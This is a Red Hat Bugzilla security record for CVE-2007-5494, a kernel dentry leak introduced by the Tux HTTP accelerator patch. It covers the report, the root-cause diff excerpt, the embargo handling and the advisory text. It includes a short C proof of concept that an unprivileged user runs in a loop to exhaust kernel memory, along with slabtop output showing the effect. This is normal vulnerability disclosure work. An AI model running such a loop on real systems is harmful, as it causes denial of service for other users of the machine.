Bug 315051 - (CVE-2007-5494) CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry
CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity high
: ---
: ---
Assigned To: Red Hat Product Security
Martin Jenner
reported=20071002,impact=important,so...
: Security
Depends On: 363461 363471 363481 363491
Blocks:
  Show dependency treegraph
 
Reported: 2007-10-02 02:37 EDT by Vasily Averin
Modified: 2011-09-29 13:02 EDT (History)
4 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2011-09-29 13:02:22 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Vasily Averin 2007-10-02 02:37:04 EDT
Due issue described in 
https://bugzilla.redhat.com/show_bug.cgi?id=313681

open(O_ATOMICLOOKUP) leaks the dentry on the filesystems where d_revalidate is
implemented.
i.e
      open ("/proc/self/exe", O_RDONLY);
      open ("/proc/self/exe", O_RDONLY | 02000000);

leaks one dentry.

By this way it's possible to eat all the memory on the node or overflow
dentry->d_count.

Both RHEL4 and RHEL5 kernels are vulnerabled

Acknowledgements:

Red Hat would like to credit Vasily Averin for reporting this issue.
Comment 1 Vasily Averin 2007-10-02 03:17:19 EDT
compile the following testcase, run it in a cycle as a user and watch memory
leaks via slabtop

$ cat tst.c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
main (int argc, char *argv[])
{
        open ("/proc/self/exe", O_RDONLY);
        open ("/proc/self/exe", O_RDONLY | 02000000);
}



 Active / Total Objects (% used)    : 2082610 / 2086261 (99.8%)
 Active / Total Slabs (% used)      : 94487 / 94488 (100.0%)
 Active / Total Caches (% used)     : 95 / 140 (67.9%)
 Active / Total Size (% used)       : 360064.96K / 360385.06K (99.9%)
 Minimum / Average / Maximum Object : 0.01K / 0.17K / 128.00K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
688286 688286 100%    0.13K  23734       29     94936K dentry_cache
682869 682869 100%    0.35K  62079       11    248316K proc_inode_cache
682558 682558 100%    0.04K   6758      101     27032K pid
  3672   3642  99%    0.05K     51       72       204K buffer_head
  3276   3166  96%    0.04K     39       84       156K sysfs_dir_cache
  2576   2483  96%    0.08K     56       46       224K vm_area_struct
  2424   2417  99%    0.48K    303        8      1212K ext3_inode_cache
  2373   2373 100%    0.03K     21      113        84K size-32
  1991   1974  99%    0.33K    181       11       724K inode_cache
  1820   1800  98%    0.27K    130       14       520K radix_tree_node
  1475   1295  87%    0.06K     25       59       100K size-64
  1350   1350 100%    0.12K     45       30       180K size-128
  1016    871  85%    0.01K      4      254        16K anon_vma
  1008    817  81%    0.16K     42       24       168K filp
   858    690  80%    0.05K     11       78        44K selinux_inode_security
   736    648  88%    0.04K      8       92        32K Acpi-Operand
   444    422  95%    2.00K    222        2       888K size-2048
   376    376 100%    0.50K     47        8       188K size-512
   375    375 100%    0.25K     25       15       100K size-256
   360    294  81%    0.19K     18       20        72K skbuff_head_cache
   360    301  83%    0.09K      9       40        36K bio
   338    297  87%    0.02K      2      169         8K Acpi-Namespace
   288    268  93%    0.43K     32        9       128K shmem_inode_cache
   254      8   3%    0.01K      1      254         4K revoke_table
   236    236 100%    0.06K      4       59        16K fs_cache
Comment 4 Eric Sandeen 2007-11-02 11:17:38 EDT
Mark, it's tux, via linux-2.6-tux.patch, which introduces this:

... 
need_revalidate:
+       if (atomic)
+               return -EWOULDBLOCKIO;
        if (dentry->d_op->d_revalidate(dentry, nd))
                goto done;
        if (d_invalidate(dentry))

that return forgets to drop the dentry

-Eric
Comment 6 Mark J. Cox (Product Security) 2007-11-19 04:11:48 EST
told vendor-sec under embargo
Comment 9 Mark J. Cox (Product Security) 2007-11-29 03:28:52 EST
No other vendor said they were vulnerable to this.

Description used in text: A memory leak was found in the Tux HTTP accelerator
patch. A local user could use this flaw to cause a denial of service (memory
exhaustion). (CVE-2007-5494)

Removing embargo.
Comment 12 Kurt Seifried 2011-09-29 13:02:22 EDT
All z-stream children bugs have been closed, future tracking bugs still open, parent is no longer needed.

Note You need to log in before you can comment on or make changes to this bug.